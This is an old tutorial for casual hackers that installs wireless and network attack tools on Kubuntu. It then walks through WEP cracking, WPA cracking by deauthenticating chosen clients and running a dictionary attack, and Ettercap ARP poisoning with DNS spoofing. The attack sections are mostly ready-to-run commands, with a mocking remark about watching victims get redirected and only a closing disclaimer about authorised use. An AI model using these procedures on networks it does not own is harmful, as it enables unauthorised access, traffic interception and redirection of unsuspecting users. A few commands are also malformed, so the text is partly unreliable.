2010

Basic Penetration Testing:

Kubuntu Style
Linux for the casual hacker
Installing:
Aircrack-ng
Ettercap
Kismet
MacChanger
Metasploit Framework
Nmap
Social Engineering Toolkit (SET)
Wireshark

Basic Use:
Kismet network sniffing
Aircrack-ng WEP and WPA cracking
Ettercap ARP poisoning / DNS Spoofing

Chris Griffith
Chris@ChristopherGriffith.net
Version 1.1
February 25, 2010

PENETRATION TESTING
Step 1: Install Kubuntu .................................................................................................................................. 4
Step 2: Update apt-get .................................................................................................................................. 4
Update repository list ............................................................................................................................... 4
Upgrade current programs ....................................................................................................................... 4
Step 3: Install Basic Packages ........................................................................................................................ 4
Install Aircrack-ng.......................................................................................................................................... 5
Install Dependencies ................................................................................................................................. 5
Download Aircrack-ng ............................................................................................................................... 5
Download and Extract Dictionary ............................................................................................................. 5
Extract Aircrack-ng source files ................................................................................................................. 5
Install Aircrack-ng...................................................................................................................................... 5
Update Airodump-ng ................................................................................................................................ 5
Remove Install File .................................................................................................................................... 5
Install MacChanger ....................................................................................................................................... 6
Install Dependencies ................................................................................................................................. 6
Install MacChanger ................................................................................................................................... 6
Install Wireshark ........................................................................................................................................... 6
Install Kismet ................................................................................................................................................. 7
Install Dependencies ................................................................................................................................. 7
Download Kismet ...................................................................................................................................... 7
Extract Kismet source files ........................................................................................................................ 7
Run Configuration ..................................................................................................................................... 7
Install Kismet ............................................................................................................................................. 7
Remove Install File .................................................................................................................................... 8
Configure Kismet ....................................................................................................................................... 8
Install Metasploit .......................................................................................................................................... 9
Download Metasploit ............................................................................................................................... 9
Enable Execution ....................................................................................................................................... 9
Install Metasploit ...................................................................................................................................... 9
Remove Install File .................................................................................................................................... 9
Install SET .................................................................................................................................................... 10

Install Dependencies ............................................................................................................................... 10

Download SET ......................................................................................................................................... 10
Run SET ................................................................................................................................................... 10
Install Nmap ................................................................................................................................................ 11
Download Nmap ..................................................................................................................................... 11
Extract Nmap Files .................................................................................................................................. 11
Configure Nmap ...................................................................................................................................... 11
Install Nmap ............................................................................................................................................ 11
Install Nmap GUI, Zenmap ...................................................................................................................... 11
Remove Install Files ................................................................................................................................ 12
Install Ettercap ............................................................................................................................................ 12
Install Dependencies ............................................................................................................................... 12
Install Ettercap ........................................................................................................................................ 12
Install Ettercap's gtk GUI ......................................................................................................................... 12
Running Kismet ........................................................................................................................................... 13
Running Aircrack-ng .................................................................................................................................... 18
Scanning Networks ................................................................................................................................. 18
WEP Attack.............................................................................................................................................. 19
WPA Attack ............................................................................................................................................. 21
DNS spoofing with Ettercap ........................................................................................................................ 25
Editing Where to Redirect Targets.......................................................................................................... 25
Sniffing Network Traffic .......................................................................................................................... 25
Poisoning Targets .................................................................................................................................... 27
Contact Info................................................................................................................................................. 29
Legal Notice and Disclaimer ........................................................................................................................ 29
Liability .................................................................................................................................................... 29
Legality .................................................................................................................................................... 29

STEP 1: INSTALL KUBUNTU

(Most of these commands are also friendly with other flavors of Ubuntu)

Go to http://www.kubuntu.org/
Download (free) or Order a CD/DVD of Kubuntu
Install Kubuntu if you need help there are plenty of community support sites online similar to
linux.com that will help you get started

STEP 2: UPDATE APT-GET

Note: requires internet connection
apt-get is the program that you will be using to download multiple components. The first step is to update its
repository list and also see if there are any program updates needed. To run these commands start the terminal.
It can be found under Applications >> System >> Terminal.

UPDATE REPOSITORY LIST

sudo apt-get -y update

UPGRADE CURRENT PROGRAMS

sudo apt-get -y upgrade

STEP 3: INSTALL BASIC PACKAGES

These will make your life easier while installing packages and using kubuntu.
sudo apt-get -y install build-essential subversion libglut3-dev python-dev iw
libssl-dev

Note: While installing, it is assumed that you are starting in your home directory. You can make sure
you are in that directory before doing any installations by typing in:
sudo cd ~

NOTICE: Each block of code represents a single command, even if on multiple rows!

INSTALL AIRCRACK-NG
Website: http://aircrack-ng.org/
Description: "Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once
enough data packets have been captured. It implements the standard FMS attack along with some optimizations
like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other
WEP cracking tools."

INSTALL DEPENDENCIES
sudo apt-get -y install build-essential libssl-dev libsqlite3-0 iw rar unrar

DOWNLOAD AIRCRACK-NG
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

DOWNLOAD AND EXTRACT DICTIONARY

wget http://www.christophergriffith.net/downloads/Glist.rar

unrar e Glist.rar

EXTRACT AIRCRACK-NG SOURCE FILES

tar -zxvf aircrack-ng-1.0.tar.gz

INSTALL AIRCRACK-NG
cd aircrack-ng-1.0

make

sudo make install

UPDATE AIRODUMP-NG
sudo airodump-ng-oui-update

REMOVE INSTALL FILE

cd ~

sudo rm aircrack-ng-1.0.tar.gz

sudo rm r aircrack-ng-1.0

INSTALL MACCHANGER
Website: http://www.alobbs.com/macchanger
Description: A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces

INSTALL DEPENDENCIES
sudo apt-get -y install macchanger iproute-dev zenity

INSTALL MACCHANGER
sudo apt-get -y install macchanger-gtk

INSTALL WIRESHARK
Website: http://www.wireshark.org
Description: "Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de
jure) standard across many industries and educational institutions."
sudo apt-get -y install wireshark

INSTALL KISMET
Website: http://www.kismetwireless.net/
Description: "Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate
hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow
sniffing other media such as DECT.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting
(and given time, de-cloaking) hidden networks, and inferring the presence of nonbeaconing networks via data
traffic. "

INSTALL DEPENDENCIES
sudo apt-get -y install libruby libcurses-ruby libncurses5-dev libncurses5

sudo apt-get -y install libpcap-dev libnl-dev libnl1

DOWNLOAD KISMET
wget http://www.kismetwireless.net/code/kismet-2010-01-R1.tar.gz

EXTRACT KISMET SOURCE FILES

tar -zxvf kismet-2010-01-R1.tar.gz

RUN CONFIGURATION
cd kismet-2010-01-R1

./configure

Note: (LOOK AT THE OUTPUT! It may say "LibNL/nl80211 support was not found." check to make sure
it's installed. The terminal may just say this because it's just not needed/used. If there are errors here
try to fix them and then you will need to run this command again before "make dep")
INSTALL KISMET
make dep

sudo make install

Note: It will give the option to use "sudo make suidinstall" which means you do not have to run kismet
as root, however in kubuntu that is very temperamental and requires the kismet_server to be started
as root separately anyways. I would recommend just using "sudo make install" and running it as root.
REMOVE INSTALL FILE
cd ~

sudo rm kismet-2010-01-R1.tar.gz

sudo rm r kismet-2010-01-R1

CONFIGURE KISMET
You will also have to edit the configuration file before using kismet. This will be covered in the section
below about kismet usage. You can edit the file by typing
sudo kate /usr/local/etc/kismet.conf

INSTALL METASPLOIT
Metasploit is arguably the best open database of exploits.
Website: http://www.metasploit.com/
Description: "Metasploit provides useful information and tools for penetration testers, security researchers, and
IDS signature developers. This project was created to provide information on exploit techniques and to create a
functional knowledgebase for exploit developers and security professionals."

DOWNLOAD METASPLOIT
wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run

ENABLE EXECUTION
chmod +x framework-3.3.3-linux-i686.run

INSTALL METASPLOIT
sudo ./framework-3.3.3-linux-i686.run

REMOVE INSTALL FILE

In case you hate cluttering up your home folder like I do, remove the install files with:
sudo rm framework-3.3.3-linux-i686.run

INSTALL SET
The Social Engineering Toolkit, a very nice and easy way to run a multitude of different exploits, by exploiting the
user with payloads from Metasploit.
Website: http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit
Description: "The Social-Engineering Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates
many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate
and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a
practice that not many people perform."

INSTALL DEPENDENCIES
NOTE: SET requires Metasploit, please install it before trying to run SET
sudo apt-get -y install subversion libglut3-dev python-dev iw ruby-full

DOWNLOAD SET
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

RUN SET
SET does NOT require installation. To run SET, go it it's directory and type in " sudo ./set " In this scenario, the
code would look like:
cd SET

sudo ./set

INSTALL NMAP
Website: http://nmap.org/
Description: Nmap (Network Mapper) is a free and open source utility for network exploration or security
auditing. Many systems and network administrators also find it useful for tasks such as network inventory,
managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel
ways to determine what hosts are available on the network, what services (application name and version) those
hosts are offering, what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks,
but works fine against single hosts.

Note: If you simply want to install Nmap and Zenmap and not worry if they are the latest version just
type:
sudo apt-get -y install nmap

sudo apt-get -y install zenmap

If you DO want the newest version, follow these steps:

DOWNLOAD NMAP
wget http://nmap.org/dist/nmap-5.21.tar.bz2

EXTRACT NMAP FILES

bzip2 -cd nmap-5.21.tar.bz2 | tar xvf -

CONFIGURE NMAP
cd nmap-5.21

./configure

INSTALL NMAP
make

sudo make install

INSTALL NMAP GUI, ZENMAP

sudo apt-get -y install zenmap

REMOVE INSTALL FILES

cd ~

sudo rm nmap-5.21.tar.bz2

sudo rmdir nmap-5.21

INSTALL ETTERCAP
Website: http://ettercap.sourceforge.net/
Description: Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections,
content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many
protocols (even ciphered ones) and includes many feature for network and host analysis.

Note: Ettercap is fairly well supported by the Ubuntu team and you can usually find an up to date
version in the repositories. This just outlines which dependencies to get along with the GUI.
INSTALL DEPENDENCIES
sudo apt-get -y install libnet6-1.3-dev libpcap-dev libpthread-stubs0-dev zlib-bin
zlibc libtool libpcre3-dev libpcre-ocaml-dev openssl libssl0.9.8 libncurses5-dev
libncurses5 ettercap-common libnet1

INSTALL ETTERCAP
sudo apt-get -y install ettercap

INSTALL ETTERCAP'S GTK GUI

sudo apt-get -f -y install ettercap-gtk

RUNNING KISMET
Kismet is a user friendly program overall but needs some configuration before staring. Before starting kismet,
you need to edit the configuration file.
sudo kate /usr/local/etc/kismet.conf

Note: If you are running Ubuntu, type gedit instead of kate

Once having kismet.conf open, find the line

# logprefix=/some/path/to/logs
This is where you will have to change where all kismet's log files are stored. I personal use

/home/<myusername>/wifi/logs
(Change to your user name for your home folder.) To add these directories to your home folder, before editing
the line, open a terminal and type:
sudo mkdir ~/wifi

sudo mkdir ~/wifi/logs

The next thing you need to specify is which adapter of yours to use for wireless sniffing. Find the lines

# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
# ncsource=wlan0:name=intel,hop=false,channel=11
After all these add a line with your adapter. Most people would add

ncsource=wlan0
NOTE: If you are unsure what type of adapter you have, go to a terminal and type
ifconfig

This will display what network devices it finds. Then chose a wireless card, generally noted by wlan or wifi

The last thing you will want to change is where it says:

# Do we have a GPS?
gps=true
If you don't have a gps unit hooked up to your computer change it to

gps=false
You can now run kismet by opening a terminal and typing
sudo kismet

One opening, if configured correctly it should ask you if you want to start kismet server. Select yes

It will then give you options about the kismet server. You don't have to change anything here, click start

The terminal now will show what is running in the server, this isn't overly exciting, it will simply tell you if
anything is going wrong. Close that window to get back to kismet by going to the bottom right hand corner.

You now should see the main page of Kismet. From here you can see all the wireless networks it has picked up,
the general packet rate and how much data is being transferred. You can also select an individual network to
find out more about it. However, before being able to select a network you have to sort them. I generally like to

sort by which network has the most packet traffic. You can do this by going to the top menu, Sort >> Packets
(descending) or by hitting Alt+S then Shift + P

You can now select a network which will display general information about it. Click it or hit enter to see more
details about it. To get back to the regular view, go to Network >> Close Window or Alt + N then hit W.

Another handy view is to go to Windows >> Channel View or Alt + W then C. It will show which channels has the
most traffic, packet rate, and general signal strength.

That is the basic usage of Kismet, if you are interested in knowing more you can find a lot more usage and details
all over forums and community sites.

RUNNING AIRCRACK-NG
Aircrack is the premier network cracking program. There are a few steps that will make it much easier to crack a
network. I will outline the basics of scanning for a network to attack and how to attack it if it is either WEP or
WPA.

SCANNING NETWORKS
First you want to put your wireless card in monitor mode. Do this by typing
sudo airmon-ng start <wireless interface>

For me this looks like:

sudo airmon-ng start wlan1

We then start scanning the different networks with the interface in monitoring mode.
sudo airodump-ng mon0

The first type of attack we are going to run against a network running WEP encryption.

WEP ATTACK
Once you find a suitable target, you need to start capturing IVs. Do this by specifying the network channel and
that you only want to log IVs.
sudo airodump-ng --channel <channel number> -w <cap file> --ivs mon0

For my network, my command looks like:

sudo airodump-ng --channel 8 -w wifi/caps/WEP --ivs mon0

Once you have collected a LOT of IVs (which you can see under the "#Data" column, a few thousand at least),
start up aircrack on the file you have created. Notice that it now will be a .ivs file. It also is appended with
numbers, so the first time you run that file, it would be WEP-01.ivs.
The command would look like:
sudo aircrack-ng -a 1 <cap file>

My command is:
sudo aircrack-ng -a 1 wifi/caps/WEP-01.ivs

Select the network you want to attack.

If you find the key, you can now use it to connect to the network. If not, it will probably ask you to capture more
IVs and try again.

WPA ATTACK
WPA attacks require a device that supports packet injection; this will allow you to de-authenticate clients so
they have to reconnect, which will allow you to capture their handshake. You will also need a dictionary of
words to try and dictionary attack. You can download them online multiple places, I complied a small collection
of very large dictionaries that you can download using:

When you see a network that you are interested in, you want to refine your network search and start logging
the output.
sudo airodump-ng --channel <channel number> -w <cap file> mon0

The network I am going after is called Rogue Network which is on channel 1, so my command looks like
sudo airodump-ng --channel 1 -w wifi/caps/WPA mon0

While scanning the networks, you will notice underneath difference devices that are connect to the networks.
This attack is much more powerful if you have someone in particular to de-authenticate.
Note: Make sure you are still running airodump-ng in another terminal. You will need to capture the WPA
handshake as soon as the clients try to re-authenticate.
You can try to de-authenticate everyone and see if everyone reconnects:
sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> mon0

Or you can specify a particular client to attack, by adding one after -c

sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> -c <clients
bssid> mon0

My example looks like:

sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0

Now switch over to the airodump-ng tab, and in the upper right hand corner, see if it says WPA Handshake

If you were able to capture one, you can move over to dictionary attacking it. If you were unable to capture a
handshake, make sure you are attacking a WPA network with aireplay-ng and that there are clients connected to
it.
The next step requires a dictionary file to try and crack it using a list of common words and passwords.
sudo aircrack-ng -a 2 -w <dictionary file> <caps file>

My command will look like this

sudo aircrack-ng -a 2 -w Glist.txt wifi/caps/WPA-01.cap

It will start testing against your word list, and hopefully find the key.

DNS SPOOFING WITH ETTERCAP

EDITING WHERE TO REDIRECT TARGETS

First step it to decide where to redirect the target, you can edit the file etter.dns.
sudo kate /usr/share/ettercap/etter.dns

At the end of the file, you can type the domain you want to redirect, and the IP of where you want to redirect
to. to simply redirect someone, type the URL then A then the IP to redirect to.
For example, to redirect traffic from Google to Bing, type

google.com A 64.4.8.147
*.google.com A 64.4.8.147
The second one includes a wildcard so any subdomain of google will also be redirected or if they type www
before it. You can find the IP address of the site you want to redirect to by going to the terminal and typing:
host <website url>

This will display a list of ips tied to that domain, the main one will be the first line displayed.
Save and close the file, now start up ettercap as root.
sudo ettercap -G

Note: if you are having problems with ettercap in GTK mode try running it directly in the terminal with curses.
Do this by typing "sudo ettercap -C".
Now that you have your shinny front end, you want to first start sniffing the traffic of the network you are
connected to. Remember, ettercap only works when you are connected to a network, while aircrack and
kisment work better without being connected to a network.

SNIFFING NETWORK TRAFFIC

The next step you want to do is to start sniffing the traffic and all the hosts on your network. Start the "Unified
sniffing.." under the "Sniff" menu item (Sniff >> Unified sniffing...), or ht Shift + U

.
This will bring up a drop down box of interfaces to sniff on. Select the one which you are connected to the
network on. After selecting this and hitting ok, you will notice a larger selection of menu items.
Running in curses: you will need to type the name of the adapter in instead.
You now want to scan all the hosts on your network, to select your targets. Do this by going to Hosts >> Scan for
hosts or Ctrl + S. Once the scan is complete, press H to see the hosts it picked up, or go to Hosts >> Hosts list.

Now you need to select who you want to poison. You are currently being the "man in the middle" and are
choosing which connections to be between. To successfully spoof the DNS of the target computers, you must
know the device that they are connected too. You can usually tell by it being a far off IP from the other's on the
list. Most home routers will be 192.168.0.1 - 192.168.1.10 range. The one you see in the examples is
192.168.1.1. Select it and click on "Add to Target 1" the select all the other devices, or a specific one you want to
poison, and add it to target 2.

.
Running in curses: you will have to manually add the targets. you can do this by hitting Ctrl + T or going to
Targets >> Select TARGET(s). Then enter in the ips of the targets between the slashes. so either /192.168.1.1/
would work or /192.168.1.1-255/ if you want to do a range.
Note: You can check to make sure you specified the right targets by hitting T or going to Targets >> Current
Targets.

POISONING TARGETS
Now you need to poison the targets ARP. Go to Mitm >> Arp poisoning... A popup will appear, and you don't
need to have any optional parameters, just accept and go on. Now hit Ctrl + W to start sniffing, or go to Start >>
Start sniffing...

Finally enable the DNS Spoofing pluging by hitting Ctrl + P (Plugins >> Manage the plugins) and select
"dns_spoof".

Now in the console underneath you should see the command "Activating dns_spoof plugin..."
Then lean back and laugh as you see your plugin working, it will display content when people try to go to a
spoofed site: "dns_spoof: [<original url>] spoofed to [<new ip>]"

CONTACT INFO
I hope you have found this information useful and accurate.
If you find anything incorrect or confusing, or simply want to send a message, please feel free to contact me.
Chris@ChristopherGriffith.net

LEGAL NOTICE AND DISCLAIMER

LIABILITY
1. You are the only one liable if you use this information in an illegal or unethical manner. I hold no
responsibility for your actions with this knowledge. I hope you find it useful to test on your own network
and learn how to tighten your own security.

LEGALITY
2. It is ILLEGAL to use many of these programs on networks you dont own. Make sure you are abiding all
laws while using these programs.